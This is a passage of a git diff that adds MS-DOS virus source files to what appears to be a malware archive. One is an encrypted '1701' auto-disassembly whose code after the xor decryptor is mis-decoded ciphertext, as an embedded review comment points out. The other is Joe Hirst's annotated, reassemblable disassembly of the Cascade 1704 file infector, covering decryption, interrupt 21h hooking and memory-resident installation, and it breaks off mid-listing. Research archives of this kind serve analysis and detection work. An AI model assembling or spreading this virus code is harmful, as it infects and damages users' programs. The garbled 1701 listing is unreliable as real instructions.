0EFh,0F1h,0C4h,0BDh,0F7h, 4Bh + db 70h,0C8h,0E8h,0F3h,0F7h,0E0h + db 0F7h,0CFh, 85h, 88h, 2Ch, 04h + db 7Ch, 2Eh, 42h,0B2h,0C1h, 3Ch + db 57h, 47h,0E4h, 2Bh,0C7h, 7Eh + db 0B2h, 5Ah,0A7h, 3Fh,0D3h,0AEh + db 6Bh,0FCh,0EDh, 7Ch,0BBh, 36h + db 0CCh, 7Ch,0BFh, 0Ah,0F5h,0C2h + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1701.asm b/MSDOS/Virus.MSDOS.Unknown.1701.asm new file mode 100644 index 00000000..922e5943 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1701.asm 
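Review bot: Everything after the decrypt loop at loc_5 is ciphertext, but the listing presents it as code — `into`, `hlt`, `out 1Eh,ax`, `lock jmp $-211h`, `esc 4,[bx+di]`, `in al,0E0h` and the loc_14…loc_45 labels are the disassembler mis-decoding encrypted bytes, and a reader or signature writer who takes them literally gets behaviour the sample does not have. What should be documented instead is the decryptor: `pop bx / sub bx,131h` recovers the load delta, `lea si,[bx+14Dh]` / `mov sp,682h` set the range, and `xor [si],si / xor [si],sp / inc si / dec sp / jnz loc_5` runs with interrupts off (`cli` at loc_3) using sp as the loop counter, so the key is position-dependent and the 682h bytes from bx+14Dh must be decrypted before any of them can be read; the `test cs:data_22[bx],1 / jz $+11h` skip over the loop also deserves a named label so the no-decrypt path is visible. I would add after `; Passes: 5 Analysis Options on: none` something like `; Encrypted file infector (presumably Cascade-family, judging by the 1701-byte size and the si/sp-keyed xor loop); bytes from bx+14Dh onward are ciphertext until loc_5 has run — mnemonics emitted in that region are not real instructions`. Note also that `1701-b proc far` is not a legal MASM/TASM identifier (leading digit, hyphen), so this file does not reassemble as-is; whether that is intended for the corpus is worth stating in the header.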
@@ -0,0 +1,427 @@ + +PAGE 59,132 + +; +; +; 1701 +; +; Created: 11-Feb-92 +; Passes: 5 Analysis Options on: none +; +; + +data_31e equ 27D1h ;* +data_36e equ 4CD6h ;* +data_39e equ 6950h ;* +data_45e equ 8848h ;* +data_50e equ 0BDF1h ;* +data_53e equ 0CBC7h ;* +data_55e equ 0EA36h ;* +data_58e equ 49F2h +data_59e equ 0B0E0h +data_60e equ 0BCF1h +data_61e equ 0EAEFh + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +1701 proc far + +start: + jmp loc_2 + db 39 dup (0) +data_22 db 0 ; Data table (indexed access) + db 58 dup (0) +loc_2: + cli ; Disable interrupts + mov bp,sp + call sub_1 + +1701 endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop bx + sub bx,131h + test cs:data_22[bx],1 + jz $+11h ; Jump if zero + lea si,[bx+14Dh] ; Load effective addr + mov sp,682h +loc_4: + xor [si],si + xor [si],sp + inc si + dec sp + jnz loc_4 ; Jump if not zero + db 8Eh,0EBh,0E5h,0BDh, 62h,0F6h + db 0F7h, 06h,0EFh,0EEh,0EEh, 2Fh + db 0C2h,0E6h,0E6h,0E2h,0B1h, 11h + db 0EEh, 02h, 6Ch,0F8h, 36h,0EAh + db 3Bh,0DCh,0E0h,0C3h,0C2h,0C6h + db 0E6h,0C2h + +locloop_5: + mov si,dx + push es + db 0F1h, 60h,0D4h,0ABh, 69h, 96h + db 0EEh,0EEh,0E2h, 0Bh, 06h,0DBh + db 0E2h + db 0E2h,0EEh,0EEh,0F2h,0FAh,0F6h + db 0F6h +loc_7: + db 0F2h,0F2h, 7Ah, 87h, 61h +loc_9: + test ah,[di-80h] + add byte ptr [bp+si-7171h],0F6h + jc loc_9 ; Jump if carry Set + div dl ; al, ah rem = ax/reg + db 0F2h,0EEh,0EEh,0E2h,0E3h, 1Bh + db 16h,0C2h + db 0C2h,0CEh + db 0CEh, 1Ah,0F2h,0F6h,0ADh, 73h + db 19h, 6Dh,0CFh,0ECh, 4Eh, 49h + db 92h,0C3h,0ECh, 47h, 49h,0A4h + db 0F3h,0D8h, 7Dh, 75h,0AAh,0EFh + db 4Dh,0E2h,0E3h,0C8h, 6Ch, 65h + db 0B8h,0EFh, 4Ch,0F0h,0F3h,0A5h + db 42h,0C2h, 3Fh, 2Fh, 56h, 3Dh + db 03h, 77h, 14h,0B9h,0FEh, 46h + db 3Eh, 0Eh,0C1h, 00h, 3Bh,0D3h + db 73h, 11h, 44h,0B7h, 97h,0E9h + db 94h,0F4h + db 19h,0F0h,0E9h,0DCh, 79h, 71h + db 0A0h,0F3h,0DCh, 31h, 61h, 90h + db 0C3h, 95h, 7Eh,0E3h,0F7h, 03h + db 0EFh, 79h, 31h,0ADh,0D8h, 7Bh + db 75h, 8Fh,0EFh,0CCh, 6Eh, 61h + db 
85h,0E3h, 5Ah,0EEh, 1Eh, 7Ch + db 32h, 49h,0FEh, 12h, 73h,0B3h + db 0CDh,0CDh,0F7h, 9Dh, 07h,0FFh + db 80h,0DEh,0DCh, 87h,0E6h, 77h + db 8Bh,0F6h,0DCh +loc_14: + into ; Int 4 on overflow + db 9Bh,0EFh, 63h, 9Bh,0E0h,0ABh + db 0A0h, 9Bh,0E8h, 71h, 8Fh,0FEh + db 0BBh, 86h, 45h, 76h,0B5h,0C2h + db 4Eh, 0Bh, 8Bh, 4Ch, 07h,0E0h + db 45h,0C4h,0E4h,0F6h,0D0h, 7Bh + db 0C4h,0EFh,0EEh,0C4h, 69h,0F0h + db 0E5h,0E2h,0C4h, 4Dh,0EDh,0F2h + db 0D4h, 30h,0F0h,0F2h,0F2h, 43h + db 25h,0D2h, 48h, 43h, 05h,0EAh + db 47h, 80h,0CBh,0A1h, 46h,0A6h + db 7Dh, 2Fh, 3Fh,0CFh,0B5h,0D1h + db 1Dh,0E0h,0F1h,0B5h, 6Fh, 51h + db 20h,0F5h, 79h, 01h + db 4Fh + db 57h,0F4h, 33h, 3Dh, 66h,0C4h +loc_16: + dec bx + dec cx + mov dl,0C0h + lahf ; Load ah from flags + add ax,7EDCh + jns loc_14 ; Jump if not sign + db 0F3h, 7Fh, 61h,0C4h,0E3h, 11h + db 42h,0C8h, 6Eh,0ECh,0D8h,0EEh + db 0BFh, 7Ch, 33h,0D0h + db 7Bh,0E4h, 8Dh, 8Eh,0A4h, 44h + db 80h + db 86h, 82h,0D8h,0A8h, 02h,0FCh + db 0F3h +loc_19: + div byte ptr [bp+di+377Ch] ; al,ah rem = ax/data + lock jmp $-211h +sub_1 endp + + db 6Bh, 51h,0C8h,0E3h, 51h,0EEh + db 0F3h, 4Bh, 53h,0F0h, 0Eh, 01h + db 6Ah,0C8h, 4Fh,0C4h, 42h,0C4h + db 92h + db 9 + db 0E0h, 09h,0F4h,0DEh,0F6h,0F6h + db 0F2h,0DCh, 62h,0E0h,0F4h,0E2h + db 0F8h, 6Bh,0F4h,0FEh,0EDh,0E0h + db 0EDh, 4Ah,0D7h,0D3h, 3Fh,0D3h + db 11h,0BBh, 19h,0B9h, 87h, 07h + db 0CEh, 22h,0E7h,0FCh,0F2h, 46h + db 0DCh, 3Bh,0D3h, 73h, 17h, 2Ah + db 0E5h, 95h, 83h, 92h,0C8h, 63h + db 17h, 52h,0F5h, 87h,0ABh,0E8h + db 4Ah,0DAh,0FBh, 03h,0E3h,0ECh + db 4Fh,0D8h,0F9h,0C3h,0E0h + db 42h + db 0F4h,0CFh,0F7h, 4Eh,0DAh,0D7h + db 54h,0CCh,0E5h,0ECh,0F9h, 2Bh + db 0C3h,0FDh,0C0h, 6Eh,0FCh,0A5h + db 0F7h,0FEh, 19h,0F4h, 1Eh, 0Eh +loc_22: + jl loc_19 ; Jump if < + hlt ; Halt processor + mov dl,6Ah ; 'j' + dec word ptr ds:data_55e[si] + out 1Eh,ax ; port 1Eh ??I/O Non-standard + jc loc_22 ; Jump if carry Set + mov dl,0C0h + dec bp + mov sp,0C8E3h + inc bp + and bl,0C0h + sub sp,si + xchg ax,si + div di ; ax,dx rem=dx:ax/reg + 
db 0F2h, 4Ah,0D2h,0FBh, 0Fh,0E3h + db 0E8h, 4Fh,0DCh,0F1h,0CFh,0E0h + db 7Eh,0F4h + db 0C3h,0F7h,0ECh, 4Ah,0F2h,0CBh + db 58h, 5Fh,0E0h,0E8h,0FDh, 2Fh + db 0CFh,0F1h, 49h, 24h, 09h, 1Fh + db 65h, 0Ch, 8Eh,0F2h, 49h, 76h + db 16h, 28h,0FDh, 2Ch, 39h, 0Fh + db 4Dh, 58h,0A3h,0D8h, 36h,0F4h + db 0D9h,0EFh, 6Eh, 28h, 29h,0DAh + db 1Dh, 96h, 1Fh,0D2h,0F2h, 87h + db 1Eh, 6Ah,0A2h,0A1h, 9Fh, 9Ch + db 94h, 95h, 93h,0C0h,0DCh,0ECh + db 47h,0D8h,0B5h,0F3h,0D8h, 7Ah + db 0ECh,0BBh,0EFh,0E0h,0E5h, 5Ah + db 0E6h,0DBh, 2Fh,0C3h, 9Ch,0B8h + db 79h, 2Ah, 4Eh,0F6h,0A5h, 3Fh + db 0AFh,0A0h, 0Bh, 94h,0C5h, 87h + db 0ACh, 0Bh, 80h,0CBh,0F3h, 46h + db 0C9h,0F8h,0EDh, 48h,0C0h,0EFh + db 5Bh,0E1h,0E6h, 2Bh,0C3h, 90h + db 0D9h,0D5h, 33h, 87h,0C5h, 4Eh + db 0F0h,0B0h,0FDh, 07h,0F1h, 10h + db 0Bh,0E7h,0ECh, 61h, 85h + db 0CFh,0DCh, 7Bh,0E0h,0BBh,0F3h + db 46h,0D0h, 23h,0C3h,0CCh, 67h + db 0D8h,0CCh,0E3h,0A3h,0B4h, 87h + db 0F1h, 1Fh, 31h,0F2h,0DCh, 8Dh + db 37h, 48h, 04h, 01h, 76h, 0Ch + db 2Bh, 88h, 37h,0BEh,0F3h,0CDh + db 0Fh, 84h,0F1h, 07h, 5Dh,0E2h + db 0CCh, 66h,0D8h,0CCh,0E3h, 07h + db 9Bh,0FCh,0DCh + db 57h +loc_27: + mov bp,0F7F3h + xchg ax,di + aaa ; Ascii adjust + in al,dx ; port 0C0h, DMA-2 bas&add ch 0 + stc ; Set carry flag + db 0C0h,0E9h + db 0C3h,0B6h, 29h, 76h,0F2h,0B1h + db 0D8h, 33h,0E4h,0B5h,0EFh, 23h + db 0C3h, 90h, 3Dh,0C8h, 6Bh,0ECh + db 0AFh,0EFh, 72h, 03h,0D6h, 00h + db 33h,0D5h,0FAh, 87h, 3Ah, 83h + db 0C5h,0B5h, 4Bh, 4Fh,0AFh + db 0FCh, 37h, 4Ah,0F4h + db 0CBh, 3Fh,0D3h, 9Ch, 50h, 69h + db 3Ah, 5Eh,0E4h,0A0h,0D1h, 27h + db 0DDh, 20h, 3Fh,0D7h, 1Eh,0A2h + db 0F1h,0BDh,0D6h, 7Ah,0C2h, 84h + db 0E8h, 49h,0CCh, 83h,0CFh,0DCh + db 79h,0E0h,0BDh,0F3h, 3Fh,0CFh + db 5Ah,0A2h,0D1h, 2Fh, 2Bh,0C3h + db 09h,0CFh, 7Eh + db 4Ah,0F2h,0B4h,0C5h, 3Bh,0C1h + db 0DCh,0C3h, 23h, 70h, 13h, 28h + db 0A3h, 49h, 0Fh, 0Bh, 0Ch, 0Dh + db 0D8h, 55h,0A2h,0F3h, 5Ah,0AEh + db 58h,0ADh,0E7h, 5Fh,0E1h,0E2h + db 23h,0CFh, 4Ah,0F3h,0A1h,0D8h + db 79h,0E4h, 8Dh,0CFh,0ECh, 49h + db 0C8h, 83h,0C3h, 
0Fh,0EFh, 7Ah + db 0CCh, 3Fh,0D7h,0D8h, 79h,0FCh + db 0AFh,0EFh, 14h, 23h,0E1h, 93h + db 0E7h, 14h, 2Fh,0CEh, 87h,0F8h + db 4Eh,0F7h,0B1h,0DCh, 4Bh, 98h + db 0C5h, 83h, 4Bh,0A7h, 9Dh, 85h + db 0D3h,0D1h,0ACh,0A8h,0AFh,0ADh + db 0AAh, 6Fh, 07h, 5Ch, 1Ch,0FCh + db 0E8h +loc_33: + stc ; Set carry flag + mov cl,0B3h + mov sp,4BBEh + cmc ; Complement carry + db 0F6h, 4Dh, 86h,0F3h, 31h,0F9h + db 49h, 85h, 38h,0D7h,0C5h, 89h + db 85h + db 2Ch, 05h,0AAh,0E7h,0F1h, 79h + db 0E5h,0B6h,0E5h, 22h, 96h,0E4h + db 11h, 00h, 69h, 2Ch,0B4h,0ABh + db 0A9h,0E9h, 35h,0ECh,0F4h, 58h + db 58h, 52h, 0Dh, 00h,0BEh, 43h + db 03h, 81h,0D6h, 4Ch, 94h,0F7h + db 48h, 9Eh,0F2h, 57h,0E6h,0E2h + db 1Eh, 15h, 43h,0BBh,0BDh,0B0h + db 0E9h,0EDh, 31h,0A0h,0E8h,0A0h + db 78h, 08h, 38h,0E4h, 90h,0C7h + db 70h,0C2h,0C1h + db 0Ch + db 1Fh, 12h,0F1h,0F0h,0ACh,0F3h + db 79h, 1Eh, 18h,0E4h,0B6h,0E7h + db 19h, 6Ch,0FCh,0B6h,0EFh, 86h + db 0E0h, 4Ch, 2Ch,0F1h, 08h, 62h + db 26h, 8Ah,0F7h, 8Fh, 2Eh, 83h + db 0F7h, 79h, 62h, 5Ah,0F3h, 82h + db 0Dh, 5Fh + db 09h,0B4h,0F1h,0BCh, 21h,0B1h + db 0E0h,0B0h,0B1h, 65h, 36h, 78h + db 34h, 00h,0D0h,0A0h,0F3h, 78h + db 0CEh,0C1h, 00h, 17h, 26h,0C1h + db 0C4h, 94h,0CFh, 79h, 0Ah, 00h + db 0F0h,0A6h,0F3h, 11h, 60h,0E4h + db 0BAh,0E7h, 92h,0F0h, 58h, 34h + db 0EDh, 08h, 1Eh, 5Eh,0FEh, 87h + db 0FBh,0A6h, 0Fh, 77h,0F5h,0EAh + db 0AEh, 03h, 76h,0F5h, 85h, 31h + db 58h, 0Dh,0ADh,0A8h,0F5h,0B1h + db 2Dh,0B3h,0B3h, 6Dh,0E8h,0BEh + db 0E3h, 0Ch, 10h,0ABh, 10h, 00h + db 0AFh, 31h,0A2h, 2Ah,0AFh,0F6h + db 0C0h,0E2h, 38h, 24h,0A3h, 96h + db 0Dh,0CEh,0F2h, 82h,0FCh,0CEh + db 0D2h, 9Ah,0E8h,0DEh, 1Dh, 92h + db 0E4h, 1Ah, 21h, 17h, 2Dh,0CEh + db 42h, 84h,0F0h,0CEh, 2Dh,0F9h + db 8Ch, 7Bh, 41h, 7Eh, 45h, 9Ch + db 3Ah,0CEh, 8Eh, 7Ch, 2Ah, 0Dh + db 57h, 9Eh,0F2h,0D5h,0E8h, 8Eh + db 0E2h, 92h, 1Ch,0D1h +loc_37: + sub cx,[bx-7Eh] + db 0F2h,0B3h, 82h,0E3h,0C9h,0F4h + db 0A2h,0CEh,0B6h, 35h,0D9h, 4Dh + db 03h,0F1h, 1Ch, 77h,0FDh,0F2h + db 01h, 07h,0DCh, 51h,0B2h,0EFh + db 21h,0ABh + db 0Dh, 
08h + db 24h,0E4h + db 0BDh,0EFh,0EAh,0ECh, 4Eh,0B6h + db 0F2h, 7Ch,0D6h,0ACh, 4Fh, 01h + db 1Ah,0A6h, 5Bh, 00h,0BFh,0F2h + db 49h,0C2h,0E7h, 41h,0F2h,0F4h + db 0BBh, 23h,0F2h,0BFh,0E1h, 66h + db 18h, 1Dh, 9Ah,0EAh, 7Ah,0E4h + db 0A5h,0F7h, 46h,0FDh, 03h,0DEh + db 4Ah,0E4h, 94h,0C7h, 04h,0C4h + db 9Ah,0CFh,0F2h, 35h,0F0h,0AEh + db 0F3h,0F2h, 5Eh,0D2h,0E5h, 96h + db 0D0h, 94h + db 0E1h, 0Bh, 0Eh,0EEh, 35h,0F4h + db 0AEh,0F7h,0F2h, 4Ah,0B2h, 8Dh + db 0F5h + +locloop_40: + movsw ; Mov [si] to es:[di] +;* mov dx,offset loc_46 ;* + db 0BAh, 84h,0F0h + mov ax,ds:data_45e + cmpsb ; Cmp [si] to es:[di] + db 0F3h,0F7h, 56h,0A1h,0F3h, 10h + db 2Eh, 14h,0C4h,0B4h,0E7h, 41h + db 80h,0EFh, 4Fh, 96h,0F3h,0CDh + db 0F0h, 90h,0F3h,0B8h,0CDh, 63h + db 0A0h,0C7h, 2Eh,0A9h, 3Ch, 8Eh + db 45h, 02h,0C1h, 09h,0B1h, 53h + db 90h,0EFh, 3Fh, 02h,0D9h, 1Eh + db 90h,0E1h, 0Bh, 4Eh,0EEh, 72h + db 0FCh,0A1h,0F7h,0F0h, 52h, 5Ch + db 0Fh,0B6h, 02h,0EEh, 4Ah,0FCh + db 88h,0DEh,0AEh,0A1h,0F3h, 42h + db 0F6h, 1Ah,0B0h, 10h, 64h, 12h + db 0Ah, 60h, 18h, 0Ah,0F3h, 11h + db 9Ch, 20h, 1Ah,0EAh, 09h, 80h + db 3Fh, 6Ch, 9Bh,0C3h, 4Ah,0E0h + db 90h,0C3h, 48h,0C0h, 9Dh,0F3h + db 47h,0F6h, 08h, 34h,0C8h,0D8h + db 0BDh,0E3h, 95h,0B4h, 0Eh, 86h + db 1Ch,0D4h,0C8h,0A4h,0F3h, 83h + db 0BFh, 1Ah, 1Bh, 70h,0FCh,0AAh + db 6Ah, 72h, 78h,0F0h,0BDh, 70h + db 48h,0C8h,0C4h,0A5h,0F7h, 85h + db 0C5h, 06h,0A7h, 1Ch,0D8h,0C0h + db 0B0h,0E3h, 97h,0C0h, 06h, 3Ch + db 0Ch, 85h, 13h, 1Ah, 4Ch, 30h + db 30h, 0Ch, 2Ah,0F0h, 38h, 60h + db 97h,0CFh, 30h, 34h, 72h,0D0h + db 0A1h,0F3h, 0Fh, 10h, 20h, 52h + db 0C2h, 0Eh,0BBh, 1Ch, 1Ch, 28h + db 4Eh,0A7h,0F3h, 1Eh,0A3h, 0Ch + db 11h, 0Ah,0E7h, 8Dh,0FDh, 4Eh + db 0ECh,0A5h,0F5h, 09h, 58h,0F2h + db 0F0h, 82h,0F5h, 1Bh,0AEh, 11h + db 06h, 69h, 1Ch,0A8h, 92h,0E1h + db 0Bh,0BFh, 11h, 16h, 93h,0D2h + db 0Ah, 14h, 93h, 0Dh,0E0h, 34h + db 0C4h, 91h,0C7h,0CBh,0B7h, 96h + db 0E0h, 72h,0FCh,0A1h,0F7h,0F3h + db 0DCh, 11h,0E0h,0BCh,0E3h, 93h + db 0A3h,0FCh + +locloop_41: + in al,0E0h ; port 0E0h, 
Memory encode reg2 + db 0F1h,0FCh,0F5h,0A6h,0A5h,0A3h + db 0A0h,0D8h,0D9h,0D7h, 32h,0A6h + db 60h,0A2h, 23h,0EEh, 8Fh,0CFh + db 0CAh,0F2h, 85h,0F1h, 4Ah,0D6h + db 0EAh, 0Ah, 9Ch, 1Bh,0A6h, 41h + db 0BCh,0EFh, 4Dh, 92h,0F3h, 1Eh + db 61h, 0Ch, 4Ah,0CDh,0CEh, 2Ah + db 0ACh, 3Bh, 86h, 35h,0E4h,0AAh + db 0CFh, 81h,0F1h, 4Eh, 09h, 0Dh + db 51h, 8Ah,0EFh,0BFh,0BDh,0B8h + db 0BCh,0BBh,0B9h,0B6h,0E9h,0EDh + db 0DCh, 76h,0D0h,0A5h,0F3h,0F0h + db 20h,0FDh, 2Ch, 35h, 07h, 2Ch + db 0F4h, 08h, 59h,0F3h,0FAh, 82h + db 0EBh,0A2h,0A3h,0BCh, 5Ah,0C8h + db 2Fh,0C7h, 67h, 1Bh, 26h,0E9h + db 9Ch,0FFh, 85h,0F3h + +locloop_42: + jbe loc_45 ; Jump if below or = + clc ; Clear carry flag + mov sp,0ECC8h + inc dx + loopnz locloop_41 ; Loop if zf=0, cx>0 + + retn + db 35h, 94h + db 97h + db 0AAh +loc_45: + esc 4,[bx+di] ; coprocessor escape + esc 0,cl ; coprocessor escape + db 0F3h,0E8h,0BDh, 56h,0AAh, 5Dh + db 8Dh,0E2h, 2Fh,0CFh,0B5h, 81h + db 0F1h, 0Fh,0F1h, 31h,0DCh, 48h + db 88h, 82h, 83h, 87h, 08h, 42h + db 8Ch, 91h,0BDh, 0Dh, 4Ch,0F6h + db 0F7h, 4Bh, 57h,0E8h, 12h, 11h + db 46h, 59h,0C5h,0E2h, 5Ch,0CDh + db 0EFh,0F1h,0C4h,0BDh,0F7h, 4Bh + db 70h,0C8h,0E8h,0F3h,0F7h,0E0h + db 0F7h,0CFh, 85h, 88h, 2Ch, 04h + db 7Ch, 2Eh, 42h,0B2h,0C1h, 3Ch + db 57h, 47h,0E4h, 2Bh,0C7h, 7Eh + db 0B2h, 5Ah,0A7h, 3Fh,0D3h,0AEh + db 6Bh,0FCh,0EDh, 7Ch,0BBh, 36h + db 0CCh, 7Ch,0BFh, 0Ah,0F5h,0C2h + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1704.asm b/MSDOS/Virus.MSDOS.Unknown.1704.asm new file mode 100644 index 00000000..0f93af6a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1704.asm 
@@ -0,0 +1,919 @@
+ page 65,132
+ title The 'Cascade' Virus (1704 version)
+; ͻ
+; British Computer Virus Research Centre
+; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England
+; Telephone: Domestic 0273-26105, International +44-273-26105
+;
+; The 'Cascade' Virus (1704 version)
+; Disassembled by Joe Hirst, March 1989
+;
+; Copyright (c) Joe Hirst 1989.
+;
+; This listing is only to be made available to virus researchers
+; or software writers on a need-to-know basis.
+; ͼ
+
+ ; The virus occurs attached to the end of a COM file. The first
+ ; three bytes of the program are stored in the virus, and replaced
+ ; by a branch to the beginning of the virus.
+
+ ; The disassembly has been tested by re-assembly using MASM 5.0.
+
+RAM SEGMENT AT 400H
+
+ ; System data
+
+ ORG 4EH
+BW044E DW ? ; VDU display start address
+
+ ORG 6CH
+BW046C DW ? ; System clock
+
+RAM ENDS
+
+MCB SEGMENT AT 0 ; Memory control block references
+
+MB0000 DB ? ; MCB signature
+MW0001 DW ? ; MCB owner
+MW0003 DW ? ; MCB size
+
+MCB ENDS
+
+OPROG SEGMENT AT 0 ; Original program references
+
+ ORG 100H
+OW0100 DW ?
+OB0102 DB ?
+
+OPROG ENDS
+
+CODE SEGMENT BYTE PUBLIC 'CODE'
+ ASSUME CS:CODE,DS:OPROG
+
+VIRLEN EQU OFFSET ENDADR-START
+MAXLEN EQU OFFSET START-ENDADR-20H
+JMPADR = OFFSET START-ENDADR-2
+
+ ORG 16H
+DW0016 DW ? ; PSP parent ID
+
+ ORG 2CH
+DW002C DW ? ; PSP environment
+
+ ORG 36H
+DW0036 DW ? ; FHT segment
+
+ ORG 100H
+
+START:
+
+DB0100 DB 1 ; Encryption indicator
+
+ ; Virus entry point
+
+ENTRY: CLI
+ MOV BP,SP ; Save stack pointer
+ CALL BP0010 ; \ Get address of BP0010
+BP0010: POP BX ; /
+ SUB BX,OFFSET BP0010+2AH ; Standardise relocation reg
+ TEST DB0100[BX+2AH],1 ; Is virus encrypted
+ JZ BP0030 ; Branch if not
+ LEA SI,BP0030[BX+2AH] ; Address start of encrypted area
+ MOV SP,OFFSET ENDADR-BP0030 ; Length of encrypted area
+BP0020: XOR [SI],SI ; \ Decrypt
+ XOR [SI],SP ; /
+ INC SI ; \ Next address
+ DEC SP ; /
+ JNZ BP0020 ; Repeat for all area
+BP0030: MOV SP,BP ; Restore stack pointer
+ JMP BP0040 ; Branch past data
+
+ ; Data
+
+PROGRM EQU THIS DWORD
+PRG_OF DW 100H ; Original program offset
+PRG_SGIDW 1021H ; Original program segment
+
+INITAX DW 0 ; Initial AX value
+PROG_1 DW 2DE9H ; \ First three bytes of program
+PROG_2 DB 0DH ; /
+ DB 0, 0
+
+I1CBIO EQU THIS DWORD
+I1C_OF DW 0FF53H ; Interrupt 1CH offset
+I1C_SG DW 0F000H ; Interrupt 1CH segment
+
+I21BIO EQU THIS DWORD
+I21_OF DW 1460H ; Interrupt 21H offset
+I21_SG DW 026AH ; Interrupt 21H segment
+
+I28BIO EQU THIS DWORD
+I28_OF DW 1445H ; Interrupt 28H offset
+I28_SG DW 0270H ; Interrupt 28H segment
+
+ DW 0 ; - not referenced
+F_ATTR DW 0 ; File attributes
+F_DATE DW 0E71H ; File date
+F_TIME DW 601FH ; File time
+F_PATH EQU THIS DWORD
+PATHOF DW 044EH ; File pathname offset
+PATHSG DW 20FFH ; File pathname segment
+F_SIZ1 DW 62DBH ; File size - low word
+F_SIZ2 DW 0 ; File size - high word
+JUMP_1 DB 0E9H ; \ Jump instruction
+JUMP_2 DW 1D64H ; /
+NUMCOL DB 0 ; Number of display columns
+NUMROW DB 0 ; Number of display rows
+C80_SW DB 0 ; 80 column text switch
+CURCHA DB 0 ; Current character
+CURATT DB 0 ; Current attributes
+SWITCH DB 8 ; Switches
+ ; 01 Int 1CH active
+ ; 02 Switch 2
+ ; 04 Switch 3 - not used
+ ; 08 No display
+RAM_SG DW 0 ; Video RAM segment
+VDURAM DW 0 ; VDU display start address
+LOOPCT DW 04F8H ; Timed loop count
+I1CCNT DW 0FDAH ; Int 1CH count
+I1CMAX DW 0FDAH ; Int 1CH random number maximum +NUMPOS DW 0 ; Number of display positions +RANPOS DW 1 ; Number of lines to affect +RANDOM DW 8FB2H, 0AH, 0, 0, 100H, 0, 1414H, 14H + + ; Main program start + +BP0040: CALL BP0050 ; \ Get address of BP0050 +BP0050: POP BX ; / + SUB BX,OFFSET BP0050+2AH ; Standardise relocation reg + MOV PRG_SG[BX+2AH],CS ; Save original program segment + MOV INITAX[BX+2AH],AX ; Save initial AX value + MOV AX,PROG_1[BX+2AH] ; Get first 2 bytes of program + MOV OW0100,AX ; Replace them + MOV AL,PROG_2[BX+2AH] ; Get third byte of program + MOV OB0102,AL ; Replace it + PUSH BX + MOV AH,30H ; Get DOS version number function + INT 21H ; DOS service + POP BX + CMP AL,2 ; Version 2.X or above? + JB BP0060 ; Branch if not + MOV AX,4BFFH ; Is virus active function + XOR DI,DI ; Clear register + XOR SI,SI ; Clear register + INT 21H ; DOS service + CMP DI,55AAH ; Is virus already active + JNE BP0070 ; Branch if not +BP0060: STI + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV AX,INITAX[BX+2AH] ; Restore initial AX value + JMP PROGRM[BX+2AH] ; Branch to original program + +BP0070: PUSH BX + MOV AX,3521H ; Get interrupt 21H function + INT 21H ; DOS service + MOV AX,BX ; Move interrupt 21H offset + POP BX + MOV I21_OF[BX+2AH],AX ; Save interrupt 21H offset + MOV I21_SG[BX+2AH],ES ; Save interrupt 21H segment + MOV AX,0F000H ; \ + MOV ES,AX ; ) Address BIOS + MOV DI,0E008H ; / + CMP WORD PTR ES:[DI],'OC' ; \ Branch if not IBM BIOS + JNE BP0080 ; / + CMP WORD PTR ES:[DI+2],'RP' ; \ Branch if not IBM BIOS + JNE BP0080 ; / + CMP WORD PTR ES:[DI+4],' .' 
; \ Branch if not IBM BIOS + JNE BP0080 ; / + CMP WORD PTR ES:[DI+6],'BI' ; \ Branch if not IBM BIOS + JNE BP0080 ; / + CMP WORD PTR ES:[DI+8],'M' ; \ IBM BIOS + JE BP0060 ; / + + ; Install virus + + ASSUME ES:MCB,DS:NOTHING +BP0080: MOV AX,007BH ; Load size of virus in paragraphs + MOV BP,CS ; Get current segment + DEC BP ; \ Address back to MCB + MOV ES,BP ; / + MOV SI,DW0016 ; Get parent ID + MOV MW0001,SI ; Store as owner in MCB + MOV DX,MW0003 ; Get MCB size + MOV MW0003,AX ; Store virus size + MOV MB0000,4DH ; Store MCB identification + SUB DX,AX ; Subtract virus from original size + DEC DX ; + INC BP ; Forward from MCB + ADD BP,AX ; Add size of virus + INC BP ; And of another MCB + MOV ES,BP ; Address new PSP segment + PUSH BX + MOV AH,50H ; Set current PSP function + MOV BX,BP ; New PSP segment + INT 21H ; DOS service + POP BX + XOR DI,DI ; Clear register + PUSH ES ; \ Set stack segment to new PSP + POP SS ; / + PUSH DI + LEA DI,CPY040[BX+2AH] ; Address end of virus + MOV SI,DI ; And for source + MOV CX,VIRLEN ; Get length of virus + STD ; Going downwards + REPZ MOVSB ; Copy virus + PUSH ES ; Push new segment + LEA CX,BP0090[BX+2AH] ; \ And next instruction + PUSH CX ; / + RETF ; ... 
and load them + + ; Now running in virus at end of new program segment + +BP0090: MOV PRG_SG[BX+2AH],CS ; New segment in program address + LEA CX,DB0100[BX+2AH] ; Get length of original program + REPZ MOVSB ; Copy original program to new PSP + MOV DW0036,CS ; New segment in handle table address + DEC BP ; \ Address back to MCB + MOV ES,BP ; / + MOV MW0003,DX ; Store original program size + MOV MB0000,5AH ; Store MCB ident (last) + MOV MW0001,CS ; Store CS as owner in MCB + INC BP ; \ Forward again to PSP + MOV ES,BP ; / + PUSH DS ; \ Set ES to DS + POP ES ; / + PUSH CS ; \ Set DS to CS + POP DS ; / + LEA SI,DB0100[BX+2AH] ; Address start of virus + MOV DI,OFFSET DB0100 ; Start of program area in first area + MOV CX,VIRLEN ; Get length of virus + CLD ; Copy forwards + REPZ MOVSB ; Copy virus to start of first area + PUSH ES ; Push segment of first area + LEA AX,BP0100 ; \ Offset of next instruction + PUSH AX ; / + RETF ; ... and load them + + ; Now running in installed virus, first area + + ASSUME ES:NOTHING +BP0100: MOV DW002C,0 ; No environment pointer + MOV DW0016,CS ; Is its own parent + PUSH DS + LEA DX,INT_21 ; Interrupt 21H routine + PUSH CS ; \ Set DS to CS + POP DS ; / + MOV AX,2521H ; Set interrupt 21H function + INT 21H ; DOS service + POP DS + MOV AH,1AH ; Set DTA function + MOV DX,0080H ; DTA address + INT 21H ; DOS service + CALL GETCLK ; Copy system clock + MOV AH,2AH ; Get date function + INT 21H ; DOS service + CMP CX,07C4H ; Year 1988? + JA BP0130 ; Branch if after 1988 + JE BP0110 ; Branch if 1988 + CMP CX,07BCH ; Year 